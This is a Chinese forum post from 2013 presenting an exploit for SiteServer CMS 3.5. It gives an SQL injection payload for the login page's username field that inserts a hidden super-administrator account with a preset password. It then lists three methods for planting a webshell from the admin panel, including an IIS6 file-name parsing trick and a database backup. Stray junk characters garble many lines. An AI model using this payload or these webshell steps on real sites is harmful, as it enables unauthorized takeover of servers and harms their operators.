经测试秒杀最新的3.5版
1 z% `; v$ E! E" ^$ X: }; @5 xstieserver官网:www.siteserver.cn1 a7 q+ _ |: M) t& T
EXP:, P) _% ^- q2 Y
直接访问UserCenter/login.aspx" I) ]% L; D$ t: l" ]+ S8 S
用户名处输入:
7 B, c/ c' S1 v& d$ f T' u& [" J$ K8 G% o5 Z1 t( ]
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
2 O2 w# z) f9 v: r' W密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。3 C6 l# [2 u: ^1 a4 V
之后再访问后台SiteServer/login.aspx用插入的用户登陆
; n: d( F5 W6 `! R; g; W; A后台拿webshell的三种方法:
- q8 O8 j" ^0 i4 M一、
; {5 \! f- i1 s5 ~6 ^( m站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx% C4 ?( n2 ~3 y) o
二、3 [4 S" N& d% ^1 ~8 f' }
成员权限-》添加用户-》用户名为:1.asp
4 t, A9 O" l* |) Chttp://127.0.0.1/usercenter/" ~' K2 m7 w H1 x
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
+ P+ Q, w! j) e& [ N: P+ h(ps:后台添加用户时不会验证是否含有非法字符)
) k( o+ g& v: E' Y, g* ]/ _三、
' ]; h }- ~8 B$ }系统工具-》实用工具-》机器参数查看
/ H3 G& z% e, G# }# L( \" i可以看到数据库类型、名称,WEB路径, n `7 g6 S0 k5 G7 a5 ^
系统工具-》数据库工具-》SQL语句查询
q" j1 n& Y6 ?/ r这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对